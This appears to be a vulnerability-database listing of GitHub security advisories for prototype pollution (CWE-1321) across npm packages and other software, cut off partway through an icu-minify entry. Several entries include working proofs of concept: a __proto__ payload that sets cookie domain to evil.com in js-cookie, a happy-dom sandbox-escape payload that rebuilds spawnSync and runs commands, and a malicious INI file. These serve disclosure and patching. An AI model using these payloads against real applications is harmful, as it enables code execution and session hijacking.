CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
779 vulnerabilities reference this CWE, most recent first.
GHSA-QJX8-664M-686J
Vulnerability from github – Published: 2026-05-21 21:20 – Updated: 2026-06-11 14:05Summary
js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys.
Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down.
Impact
Any application that forwards a JSON-derived object as the attributes argument to Cookies.set, Cookies.remove, Cookies.withAttributes, or Cookies.withConverter is vulnerable. This is the standard pattern when cookie configuration comes from a backend:
const cfg = await fetch('/config').then(r => r.json());
Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker
A payload of {"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}} causes js-cookie to emit:
Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None
Affected code
// src/assign.mjs — full file
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
for (var key in source) { // includes own enumerable '__proto__'
target[key] = source[key] // [[Set]] form - fires __proto__ setter
}
}
return target
}
Proof of concept
Node 22.11.0, no third-party deps:
Environment setup
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
PoC
ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs
let lastSetCookie = '';
globalThis.document = {
get cookie() { return ''; },
set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
const attackerAttrs = JSON.parse(
'{"__proto__":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
Execution:
Suggested patch
--- a/src/assign.mjs
+++ b/src/assign.mjs
@@
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
- for (var key in source) {
- target[key] = source[key]
- }
+ for (var key in source) {
+ if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue
+ Object.defineProperty(target, key, {
+ value: source[key],
+ writable: true,
+ enumerable: true,
+ configurable: true,
+ })
+ }
}
return target
}
Equivalent one-liner alternative - iterate own names only and filter:
for (const key of Object.getOwnPropertyNames(source)) {
if (key === '__proto__') continue
target[key] = source[key]
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "npm",
"name": "js-cookie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46625"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-21T21:20:31Z",
"nvd_published_at": "2026-06-10T22:16:59Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`js-cookie`\u0027s internal `assign()` helper copies properties with `for...in` + plain assignment. When the source object is produced by `JSON.parse`, the JSON object\u0027s `\"__proto__\"` member is an *own enumerable* property, so the `for\u2026in` enumerates it and the `target[key] = source[key]` write triggers the **`Object.prototype.__proto__` setter** on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys.\n\nBecause the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=`, and `path=` on cookies whose attributes the developer thought were locked down.\n\n## Impact\n\nAny application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes`, or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:\n\n```js\nconst cfg = await fetch(\u0027/config\u0027).then(r =\u003e r.json());\nCookies.set(\u0027session\u0027, token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker\n```\n\nA payload of `{\"__proto__\":{\"domain\":\"evil.example\",\"secure\":\"false\",\"samesite\":\"None\"}}` causes js-cookie to emit:\n\n```\nSet-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None\n```\n\n## Affected code\n\n```js\n// src/assign.mjs \u2014 full file\nexport default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n for (var key in source) { // includes own enumerable \u0027__proto__\u0027\n target[key] = source[key] // [[Set]] form - fires __proto__ setter\n }\n }\n return target\n}\n```\n## Proof of concept\n\nNode 22.11.0, no third-party deps:\n\n### Environment setup\n```bash\nmkdir -p /tmp/jscookie-poc \u0026\u0026 cd /tmp/jscookie-poc\nnpm init -y\nnpm i js-cookie\n```\n\n### PoC\n```js\nubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs\nlet lastSetCookie = \u0027\u0027;\nglobalThis.document = {\n get cookie() { return \u0027\u0027; },\n set cookie(v) { lastSetCookie = v; }\n};\n\nconst { default: Cookies } = await import(\u0027js-cookie\u0027);\n\nconst attackerAttrs = JSON.parse(\n \u0027{\"__proto__\":{\"secure\":\"false\",\"domain\":\"evil.com\",\"samesite\":\"None\",\"expires\":-1}}\u0027\n);\n\nCookies.set(\u0027session\u0027, \u0027TOKEN\u0027, attackerAttrs);\n\nconsole.log(\u0027Set-Cookie that js-cookie wrote to document.cookie:\u0027);\nconsole.log(lastSetCookie);\n```\n\nExecution:\n\u003cimg width=\"2614\" height=\"1174\" alt=\"cls-2026-05-14-01 44 39\" src=\"https://github.com/user-attachments/assets/120df1fe-7e97-4ca3-904e-ab80d71ecf62\" /\u003e\n\n## Suggested patch\n\n```diff\n--- a/src/assign.mjs\n+++ b/src/assign.mjs\n@@\n export default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n- for (var key in source) {\n- target[key] = source[key]\n- }\n+ for (var key in source) {\n+ if (key === \u0027__proto__\u0027 || key === \u0027constructor\u0027 || key === \u0027prototype\u0027) continue\n+ Object.defineProperty(target, key, {\n+ value: source[key],\n+ writable: true,\n+ enumerable: true,\n+ configurable: true,\n+ })\n+ }\n }\n return target\n }\n```\n\nEquivalent one-liner alternative - iterate own names only and filter:\n\n```js\nfor (const key of Object.getOwnPropertyNames(source)) {\n if (key === \u0027__proto__\u0027) continue\n target[key] = source[key]\n}\n```",
"id": "GHSA-qjx8-664m-686j",
"modified": "2026-06-11T14:05:06Z",
"published": "2026-05-21T21:20:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/security/advisories/GHSA-qjx8-664m-686j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46625"
},
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/commit/eb3c40e89731e99b8970faaf35ddad249c6c0020"
},
{
"type": "PACKAGE",
"url": "https://github.com/js-cookie/js-cookie"
},
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/releases/tag/v3.0.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection"
}
GHSA-QPFV-44F3-QQX6
Vulnerability from github – Published: 2026-03-29 15:44 – Updated: 2026-03-31 18:55A prototype pollution vulnerability exists in the Utils.merge helper used internally by MikroORM when merging object structures.
The function did not prevent special keys such as __proto__, constructor, or prototype, allowing attacker-controlled input to modify the JavaScript object prototype when merged.
Exploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.
Prototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@mikro-orm/core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@mikro-orm/core"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0-dev.0"
},
{
"fixed": "7.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34221"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-29T15:44:16Z",
"nvd_published_at": "2026-03-31T16:16:32Z",
"severity": "HIGH"
},
"details": "A prototype pollution vulnerability exists in the `Utils.merge` helper used internally by MikroORM when merging object structures.\n\nThe function did not prevent special keys such as `__proto__`, `constructor`, or `prototype`, allowing attacker-controlled input to modify the JavaScript object prototype when merged.\n\nExploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.\n\nPrototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.",
"id": "GHSA-qpfv-44f3-qqx6",
"modified": "2026-03-31T18:55:10Z",
"published": "2026-03-29T15:44:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-qpfv-44f3-qqx6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34221"
},
{
"type": "PACKAGE",
"url": "https://github.com/mikro-orm/mikro-orm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "MikroORM has Prototype Pollution in Utils.merge"
}
GHSA-QPM2-6CQ5-7PQ5
Vulnerability from github – Published: 2025-10-15 20:29 – Updated: 2025-11-27 08:54Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.
Details
The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).
PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().
import { Browser } from "happy-dom";
const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});
page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";}
this.constructor.constructor.__proto__.__proto__.toString = f;
this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
// Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
</script>
<body>Hello world!</body></html>`;
await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
Impact
Arbitrary code execution via breaking out of the Node.js' vm isolation.
Recommended Immediate Actions
Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to isolated-vm is suggested instead.
Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "happy-dom"
},
"ranges": [
{
"events": [
{
"introduced": "19.0.0"
},
{
"fixed": "20.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62410"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-15T20:29:04Z",
"nvd_published_at": "2025-10-15T18:15:40Z",
"severity": "CRITICAL"
},
"details": "### Summary\nThe mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.\n\n### Details\nThe untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like \"process\" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).\n\n### PoC\nAttackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., \"process\". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().\n\n```js\nimport { Browser } from \"happy-dom\";\n\nconst browser = new Browser({settings: {enableJavaScriptEvaluation: true}});\nconst page = browser.newPage({console: true});\n\npage.url = \u0027https://example.com\u0027;\nlet payload = \u0027spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined\u0026\u0026(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c\u003ca.stdio.length;c++){var e=a.stdio[c]\u0026\u0026a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output\u0026\u0026a.encoding\u0026\u0026a.encoding!==`buffer`)for(c=0;c\u003cb.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output\u0026\u0026b.output[1],b.stderr=b.output\u0026\u0026b.output[2],b.error\u0026\u0026(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};\u0027\npage.content = `\u003chtml\u003e\n\u003cscript\u003e\n function f() { let process = this; ${payload}; spawnSync(\"touch\", [\"success.flag\"]); return \"success\";} \n this.constructor.constructor.__proto__.__proto__.toString = f;\n this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;\n // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf\n \n\u003c/script\u003e\n\u003cbody\u003eHello world!\u003c/body\u003e\u003c/html\u003e`;\n\nawait browser.close();\nconsole.log(`The process object is ${process}`);\nconsole.log(process.hasOwnProperty(\u0027spawn\u0027));\n```\n\n### Impact\nArbitrary code execution via breaking out of the Node.js\u0027 vm isolation.\n\n### Recommended Immediate Actions\nUsers can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://github.com/laverdet/isolated-vm) is suggested instead.\n\nCris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.",
"id": "GHSA-qpm2-6cq5-7pq5",
"modified": "2025-11-27T08:54:46Z",
"published": "2025-10-15T20:29:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62410"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/f4bd4ebe3fe5abd2be2bcea1c07043c8b0b70eea"
},
{
"type": "PACKAGE",
"url": "https://github.com/capricorn86/happy-dom"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "happy-dom\u0027s `--disallow-code-generation-from-strings` is not sufficient for isolating untrusted JavaScript"
}
GHSA-QQGX-2P2H-9C37
Vulnerability from github – Published: 2020-12-10 16:53 – Updated: 2022-12-03 03:55Overview
The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ini"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7788"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-12-10T16:51:39Z",
"nvd_published_at": "2020-12-11T11:15:00Z",
"severity": "HIGH"
},
"details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```",
"id": "GHSA-qqgx-2p2h-9c37",
"modified": "2022-12-03T03:55:11Z",
"published": "2020-12-10T16:53:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788"
},
{
"type": "WEB",
"url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/ini"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-INI-1048974"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1589"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse"
}
GHSA-QR4M-JCVC-3382
Vulnerability from github – Published: 2021-05-06 18:12 – Updated: 2021-05-05 18:52All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "dot-notes"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7717"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-05T18:52:45Z",
"nvd_published_at": "2020-09-01T10:15:00Z",
"severity": "CRITICAL"
},
"details": "All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.",
"id": "GHSA-qr4m-jcvc-3382",
"modified": "2021-05-05T18:52:45Z",
"published": "2021-05-06T18:12:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7717"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-DOTNOTES-598668"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in dot-notes"
}
GHSA-QR4P-C9WR-PHR6
Vulnerability from github – Published: 2021-03-19 21:01 – Updated: 2021-03-18 23:53Prototype pollution vulnerability in 'set-in' versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "set-in"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28273"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-18T23:53:31Z",
"nvd_published_at": "2020-12-02T15:15:00Z",
"severity": "CRITICAL"
},
"details": "Prototype pollution vulnerability in \u0027set-in\u0027 versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.",
"id": "GHSA-qr4p-c9wr-phr6",
"modified": "2021-03-18T23:53:31Z",
"published": "2021-03-19T21:01:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28273"
},
{
"type": "WEB",
"url": "https://github.com/ahdinosaur/set-in/commit/e431effa00195a6f06b111e09733cd1445a91a88"
},
{
"type": "WEB",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28273"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in set-in"
}
GHSA-QRX9-X75W-XWJ4
Vulnerability from github – Published: 2023-07-17 15:30 – Updated: 2024-04-04 06:10The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.
{
"affected": [],
"aliases": [
"CVE-2023-3186"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-17T14:15:10Z",
"severity": "CRITICAL"
},
"details": "The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.",
"id": "GHSA-qrx9-x75w-xwj4",
"modified": "2024-04-04T06:10:10Z",
"published": "2023-07-17T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3186"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/545007fc-3173-47b1-82c4-ed3fd1247b9c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QXCH-WHHJ-8956
Vulnerability from github – Published: 2026-05-18 17:35 – Updated: 2026-05-18 17:35Impact
multiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a multipart/form-data request with a field name that collides with an inherited Object.prototype property (e.g., __proto__, constructor, toString), the parser invokes .push() on the inherited prototype value rather than an array, throwing a TypeError that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.
Patches
Users should upgrade to multiparty@4.3.0 or higher.
Workarounds
None.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.3"
},
"package": {
"ecosystem": "npm",
"name": "multiparty"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-8161"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T17:35:01Z",
"nvd_published_at": "2026-05-12T10:16:48Z",
"severity": "HIGH"
},
"details": "### Impact\n\nmultiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a `multipart/form-data` request with a field name that collides with an inherited `Object.prototype` property (e.g., `__proto__`, `constructor`, `toString`), the parser invokes `.push()` on the inherited prototype value rather than an array, throwing a `TypeError` that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.\n\n### Patches\n\nUsers should upgrade to multiparty@4.3.0 or higher.\n\n### Workarounds\n\nNone.",
"id": "GHSA-qxch-whhj-8956",
"modified": "2026-05-18T17:35:01Z",
"published": "2026-05-18T17:35:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pillarjs/multiparty/security/advisories/GHSA-qxch-whhj-8956"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8161"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/pillarjs/multiparty"
},
{
"type": "WEB",
"url": "https://github.com/pillarjs/multiparty/releases/tag/v4.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "multiparty: Denial of Service via Prototype Pollution leads to Uncaught Exception"
}
GHSA-QXVV-6MM7-75FH
Vulnerability from github – Published: 2022-05-24 17:16 – Updated: 2022-12-02 21:30Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.
{
"affected": [],
"aliases": [
"CVE-2020-12079"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-20"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-23T04:15:00Z",
"severity": "CRITICAL"
},
"details": "Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.",
"id": "GHSA-qxvv-6mm7-75fh",
"modified": "2022-12-02T21:30:42Z",
"published": "2022-05-24T17:16:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12079"
},
{
"type": "WEB",
"url": "https://github.com/beakerbrowser/beaker/issues/1519"
},
{
"type": "WEB",
"url": "https://github.com/beakerbrowser/beaker/releases/tag/0.8.9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R27J-894H-3W3P
Vulnerability from github – Published: 2026-05-06 17:32 – Updated: 2026-05-06 17:32Summary
icu-minify's runtime formatter resolves select branches by looking up the runtime value as a plain property on a prototype-bearing object. When the value coerces to a key that exists on Object.prototype (e.g. toString, __proto__, constructor, hasOwnProperty, valueOf), the lookup returns a truthy value that short-circuits the ?? options.other fallback, and the downstream iterator crashes with TypeError: nodes is not iterable. Any consumer that forwards user input into a {arg, select, …} placeholder — a common idiom for role, status, type, gender — can be crashed per-request by supplying one of those keys. In Next.js SSR (via next-intl with experimental.messages.precompile) this yields a 500 for the affected render.
Details
Vulnerable code paths
Compilation produces a plain object whose prototype chain includes all Object.prototype members:
// packages/icu-minify/src/compile.tsx:191-199
function compileSelect(node: SelectElement): CompiledNode {
